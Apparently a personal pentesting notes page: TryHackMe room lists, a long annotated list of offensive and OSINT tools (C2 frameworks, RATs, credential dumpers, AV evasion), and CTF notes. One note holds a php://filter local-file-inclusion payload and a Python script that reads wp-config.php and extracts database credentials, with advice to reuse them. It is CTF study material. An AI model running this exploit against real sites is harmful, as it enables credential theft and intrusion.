👻 To-do 👻

Stuff that I found, but never read/used yet. See also the Blogs section.

Pentesting certification

  • OSCP
  • GPEN
  • GXPN

GitHub Topics

Roadmap


Reading articles


Resources

Mobile

Joker

Active directory 🧸

  • None

CMS

  • None

Defense

  • None

CTFs Practice

Networking

Windows

Linux

  • ...

OSINT

Cloud

  • Attacking and Defending AWS

Tools

Big THM CTF List
https://tryhackme.com/room/surfer
https://tryhackme.com/room/lazyadmin (notes below)
https://tryhackme.com/room/ninjaskills
https://tryhackme.com/room/gamezone
https://tryhackme.com/room/skynet
https://tryhackme.com/room/alfred
https://tryhackme.com/room/brooklynninenine
https://tryhackme.com/room/breakoutthecage1
https://tryhackme.com/room/blog
https://tryhackme.com/room/jason
https://tryhackme.com/room/source
https://tryhackme.com/room/committed
https://tryhackme.com/room/toolsrus
https://tryhackme.com/room/kiba
https://tryhackme.com/room/bruteit
https://tryhackme.com/room/dejavu
https://tryhackme.com/room/tonythetiger (java)
--- Medium
https://tryhackme.com/room/ultratech1 (web - guided?)
https://tryhackme.com/room/hackpark (windows, guided)
https://tryhackme.com/room/anonymous (nmap, smb?, ...)
https://tryhackme.com/room/overpass2hacked
https://tryhackme.com/room/overpass3hosting (web/...) 
--- Hard
https://tryhackme.com/room/mrrobot
https://tryhackme.com/room/dailybugle
https://tryhackme.com/room/retro (blaster...)

Long list of tools

Legend

  • 🔎 = Investigation
  • 🏝️ = Discovery
  • 💥 = Exploitation
  • 🔑 = Privilege escalation
  • ✈️ = Post-exploitation
  • 🛡️ = Defense
  • 🏃 = Special

Tools

  • legion (🏝💥✈️) (semi-automated network penetration testing framework)
  • beyondsecurity (🔎🏝💥) (vulnerability scanner)
  • KitHack (🔎🏝💥✈️) (penetration testing framework)
  • hoaxshell (💥✈️) (Windows reverse shell generator and listener that tunnels over HTTP(S); not a recon tool)
  • Villain (🔎✈️) (post-exploitation framework, multi-session handler for reverse shells/backdoors)
  • OWASP Amass (🏝) (subdomain enumeration, DNS mapping, attack surface discovery)
  • HackTools (🔎🏝💥) (browser extension bundling reverse shell, XSS and other payload cheat sheets)
  • TheFatRat (💥✈️) (backdoors and payloads)
  • Phantom-Evasion (💥✈️) (generate and obfuscate Windows payloads, antivirus evasion)
  • msfpc (💥✈️) (MSFvenom Payload Creator, wrapper around msfvenom)
  • arsenal (✈️) (data exfiltration)
  • hackertarget (🏝) (online port scanning, traceroute, and reverse IP lookup)
  • Raccoon (🏝) (recon: subdomains, OSINT)
  • Photon (🏝) (web crawler: URLs, subdomains, keys)
  • Hping3 (💥) (packet crafting; firewall bypass, port/OS scanning; -S -p <port>: a reply with flags=SA means open, RA means closed; --flood for flood tests)
  • QualysGuard (🔎🔑✈️) (cloud-based vulnerability scanner)
  • Acunetix (🔎💥) (web vulnerability scanner)
  • Nexpose (🔎🔑✈️) (network vulnerability scanner)
  • Retina (🔎🔑✈️) (vulnerability scanner)
  • Nipper (🔎) (network device configuration audit)
  • Nettacker (🏝💥) (port scanning, vulnerability scanning)
  • Empire (✈️) (post-exploitation framework) N/O
  • DSSS (🏝💥) (Damn Small SQLi Scanner)
  • BeEF (💥✈️🛡️) (7.8k ⭐, Browser Exploitation Framework: hooks victim browsers for client-side attacks)
  • host (🔎🏝) (DNS lookup)
  • dnswalk (🔎🏝) (DNS zone checker and debugger)
  • dnsmap (🔎🏝) (subdomain brute force)
  • Netsparker (🏝💥✈️) (web vulnerability scanner)
  • Skipfish (🏝) (11.4k ⭐, web vulnerability scanner)
  • W3af (🏝💥🔑) (web vulnerability scanner)
  • Arachni (🏝💥) (web vulnerability scanner)
  • AppScan (🏝💥) (web vulnerability scanner)
  • IronWASP (🏝💥) (web vulnerability scanner)
  • Grabber (🏝💥) (web vulnerability scanner)
  • proxify (✈️) (HTTP proxy)
  • interactsh (✈️) (out-of-band interaction server: catches DNS/HTTP callbacks from blind SSRF/XXE/RCE)
  • naabu (🏝) (port scanner)
  • nuclei (🏝💥) (template-based vulnerability scanner)
  • dnsx (🏝) (DNS enumeration and resolution toolkit)
  • bettercap (💥) (sniffing, MITM)
  • evilgrade (💥✈️) (exploiting insecure software update mechanisms via MITM)
  • CodeSec (🏝💥) (web vulnerability scanner)
  • venom (🔎🏝💥🔑✈️) (payloads? -h/-c/-u/-p/-s, scan/crawl/portscan)
  • Burp Collaborator client (🏃) (out-of-band server for SSRF/XXE/...)
  • recon-ng (🔎) (reconnaissance framework)
  • Archive.is (🔎) (web archive)
  • CommonCrawl (🔎) (open web crawl dataset)
  • Netcraft (🔎) (web investigation, site reports)
  • PassiveTotal (🔎) (IP/domain/email analysis)
  • intelius/zabasearch (🔎) (people search engines)
  • peoplefinder (🔎) (people search engine)
  • Pipl (🔎) (people search engine)
  • awesome-osint (🔎) (12.1k ⭐, list of tools)
  • OSINT-Tools (🔎) (list of tools)
  • Social Mapper (🔎🏝) (SOCMINT, matches faces across social networks)
  • StalkScan (🔎) (Facebook recon)
  • SpiderFoot (🔎🏝✈️) (9.4k ⭐, automated OSINT)
  • FMiner (🔎🏝) (web scraping)
  • Octoparse (🔎🏝) (web scraping)
  • ParseHub (🔎🏝) (web scraping)
  • Tor Browser (🔎✈️) (web browser)
  • DarkSearch (🏝) (darknet search engine)
  • Ahmia (🏝) (Tor search engine)
  • OnionScan (🔎) (scan Tor hidden services)
  • Censys (🔎🏝) (device/network search engine)
  • Zoomeye (🔎🏝) (Chinese device/network search engine)
  • BinaryEdge (🔎🏝) (device search engine)
  • Fofa (🔎🏝) (device/network search engine)
  • Shikata ga nai (💥) (msfvenom polymorphic XOR encoder, x86/shikata_ga_nai)
  • unicorn (💥) (TrustedSec: PowerShell downgrade attack and shellcode injection)
  • Cobalt Strike (💥✈️) (commercial adversary simulation / C2 platform)
  • searchlight (🔎) (OSINT)
  • WebScarab (🔎🏝) (intercept HTTP requests, legacy OWASP proxy)
  • Vega (🔎🏝) (web application scanner)
  • Aircrack-ng (💥🔑) (capture Wi-Fi traffic, crack WEP/WPA keys)
  • Kismet (🏝) (wireless network detection and analysis)
  • MBSA (🏝) (Microsoft Baseline Security Analyzer, discontinued; checks Windows hosts for missing patches and misconfigurations)
  • Cain and Abel (💥🔑✈️) (password recovery, sniffing, MITM, spoofing)
  • Ettercap (💥🔑✈️) (sniffing, MITM, spoofing)
  • Greenbone (🏝) (vulnerability management, OpenVAS)
  • AppDetectivePro (🏝🛡️) (database vulnerability scanner)
  • Dbprotect (🏝🛡️) (database vulnerability scanner)
  • sputnik (🔎) (OSINT scanner)
  • netdiscover (🏝) (ARP-based host discovery, -r IP/CIDR)
  • Mxtoolbox (🔎) (email/DNS configuration checks)
  • HP WebInspect (🏝💥) (web application scanner)
  • Linsniff (🔎) (packet capture and analysis)
  • Websniff (🔎) (packet capture and analysis)
  • Snoop (🔎) (packet capture and analysis)
  • SSLyze (🏝) (TLS configuration scanner and analyzer)
  • webslayer (🏝) (web application brute forcing)
  • Tamper Chrome|tamper.dev (🏝💥) (intercept and modify HTTP requests in the browser)
  • httpx (🏝💥) (HTTP probing, web server enumeration)
  • Core Impact (💥🔑✈️) (commercial exploitation framework)
  • chaos (🔎) (DNS recon)
  • Veil Framework (💥) (payload generation, antivirus evasion)
  • FavFreak (🏝) (favicon hash recon)
  • waybackurls (🔎) (fetch known URLs from the Wayback Machine)
  • EyeWitness (screenshots of web services)
  • ptunnel (TCP over ICMP tunnelling)
  • sshuttle (VPN-like tunnelling over SSH)
  • red-team-scripts
  • NetworkMiner (network forensics, pcap analysis)
  • NetWitness (network forensics)
  • EXOCET
  • HackBrowserData (dump saved browser passwords, cookies, history)
  • AutoRecon (automated multi-threaded service enumeration)
  • ssf (Secure Socket Funneling, tunnelling and port forwarding)
  • pupy (cross-platform RAT / post-exploitation tool)
  • nishang (offensive PowerShell scripts)
  • Mythic (C2 framework)
  • darkarmour (antivirus evasion tool)
  • vbe-decoder (decode encoded VBScript .vbe files)
  • Bluto (DNS recon, subdomain brute force, email enumeration)

CTFs not done

https://tryhackme.com/room/lazyadmin 🐍🐍⭐

  • nmap
  • Gobuster
  • FTP put did not seem to accept a local path: it works if you start the FTP client from the directory containing the file (or change the local directory first with lcd)

https://tryhackme.com/room/allinonemj 🐍🐍⭐

  • Test: wpscan --url http://IP/wordpress/ --detection-mode aggressive
  • php://filter/convert.base64-encode/resource=../../../../../wp-config.php (file inclusion, https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/)
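An added example (not from the room or the original notes) that turns the php://filter trick above into a small loot script: it builds the base64-encoding wrapper payload for a chosen traversal depth, pulls the base64 blob out of the HTTP response body and parses the DB_* credentials out of the decoded wp-config.php. The endpoint, the parameter name (page) and the wp-config.php content are constructed assumptions for the demo, not data from the room.

```python
import base64
import re
from urllib.parse import urlencode

# Assumed vulnerable endpoint and parameter name (hypothetical; not from the room).
BASE_URL = "http://IP/index.php"
PARAM = "page"


def filter_payload(resource: str, depth: int = 5) -> str:
    """php://filter wrapper that returns the file base64-encoded instead of executing it.

    The base64 conversion is what makes PHP source readable: a plain include would
    execute wp-config.php and print nothing. php://filter is a local stream wrapper,
    so it works even when allow_url_include is off.
    """
    return "php://filter/convert.base64-encode/resource=" + "../" * depth + resource


def candidate_payloads(resource: str, max_depth: int = 8):
    """Traversal depth is usually unknown; try each depth until a blob comes back."""
    return [filter_payload(resource, d) for d in range(0, max_depth + 1)]


def lfi_url(resource: str, depth: int = 5) -> str:
    """Full request URL; '/', ':' and '=' are left unencoded so the query stays readable."""
    return f"{BASE_URL}?{urlencode({PARAM: filter_payload(resource, depth)}, safe='/:.=')}"


def decode_filter_response(body: str) -> str:
    """Pull the base64 blob out of the surrounding HTML and decode it.

    The longest base64-looking run is taken, which skips short tokens such as tag names.
    """
    runs = re.findall(r"[A-Za-z0-9+/]{40,}={0,2}", body)
    if not runs:
        raise ValueError("no base64 blob in response: wrong depth, wrong path or filter blocked")
    blob = max(runs, key=len)
    # Re-pad in case the page template cut the blob short of a 4-char boundary.
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


# Matches define( 'DB_NAME', 'wordpress' ); with either quote style and loose spacing.
WP_DEFINE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def wp_db_settings(config_src: str) -> dict:
    """Return the DB_* constants from wp-config.php source as a dict."""
    return dict(WP_DEFINE.findall(config_src))


# Constructed sample data (not captured from a real target).
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'S3cr3t!' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
"""
SAMPLE_RESPONSE = (
    "<html><body>\n"
    + base64.b64encode(SAMPLE_WP_CONFIG.encode()).decode()
    + "\n</body></html>"
)


if __name__ == "__main__":
    print(lfi_url("wp-config.php"))
    print(wp_db_settings(decode_filter_response(SAMPLE_RESPONSE)))
```

Against a live target you would request each URL from candidate_payloads() in turn and feed the response body to decode_filter_response(); a ValueError means that depth (or the path) is wrong rather than that the include is not vulnerable. The recovered DB_USER/DB_PASSWORD are what you reuse against MySQL or the WordPress admin if the operator recycled them.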

👻 To-do (continued) 👻

More stuff that I found, but never read/used yet:

https://redteam.guide/ (book)
https://www.hackers-arise.com (book)
Hack Like a LEGEND (book)
https://ippsec.rocks/?#
